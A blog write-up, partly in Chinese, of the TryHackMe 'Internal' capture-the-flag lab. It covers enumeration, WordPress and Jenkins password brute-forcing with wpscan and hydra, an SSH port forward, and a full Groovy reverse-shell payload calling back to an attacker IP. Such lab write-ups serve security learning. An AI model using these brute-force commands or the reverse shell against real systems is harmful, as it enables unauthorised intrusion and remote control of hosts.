THM-OP-Internal

Mkd1R 2022-5-31 103 5/31

#Enumeration

-nmap

┌──(root㉿Mkd1R)-[~]
└─# nmap -sS -Pn -open -T4 -p- 10.10.187.154                                 
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

-nmap2

                                                                                                                                                                                                        
┌──(root㉿Mkd1R)-[~]
└─# nmap -p22,80 -A 10.10.187.154                                            
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   275.45 ms 10.18.0.1
2   275.92 ms internal.thm (10.10.187.154)

#Web Enumeration

-Gobuster

┌──(root㉿Mkd1R)-[~]
└─# gobuster dir -u internal.thm -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,json -o gbig2.txt
===============================================================
/blog                 (Status: 301) [Size: 311] [--> http://internal.thm/blog/]
/index.html           (Status: 200) [Size: 10918]                              
/wordpress            (Status: 301) [Size: 316] [--> http://internal.thm/wordpress/]
/javascript           (Status: 301) [Size: 317] [--> http://internal.thm/javascript/]
/phpmyadmin           (Status: 301) [Size: 317] [--> http://internal.thm/phpmyadmin/]
wpscan枚举wp脆弱插件:无,存在用户admin,phpmyadmin无账户密码登录

wpscan --url http://internal.thm/blog --usernames admin --passwords /usr/share/wordlists/rockyou.txt  //尝试爆破admin用户密码

#Exploitation

使用账号密码登录wordpress,接下来就是修改wordpress 404.php来反弹shell
全盘搜索txt文件(find / -name *.txt 2>/dev/null),找个一个提示文件,靶机存在aubreanna用户,这里又给了密码,可以直接使用ssh连接进来
在/var/www/html/wordpress/wp-config.php文件中有账号密码,此账号密码可以用来登录phpmyadmin

#Elevate privileges

ssh连入靶机家目录有点提示说172.17.0.3:8000在运行,看了下网卡存在docker,随时使用ssh做一下端口转发(ssh -L 1234:172.17.0.2:8080 aubreanna@internal.thm)
访问是一个Jenkins,默认用户是admin,可以使用hydra或者burp爆破一下密码使用rockyou当做字典
hydra -l admin -P  /usr/share/wordlists/rockyou.txt -s 1234 127.0.0.1 http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2f&Submit=Sign+in&Login=Login:Invalid username or password'

爆破出jenkins密码为spongebob,登录进行反弹shell
String host="10.18.123.159";
int port=2233;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
全局查找txt文件发现一个note.txt文件存在root密码
使用低权限的ssh su到root
- THE END -

Mkd1R

7月02日21:53

最后修改:2022年7月2日
0

非特殊说明,本博所有文章均为博主原创。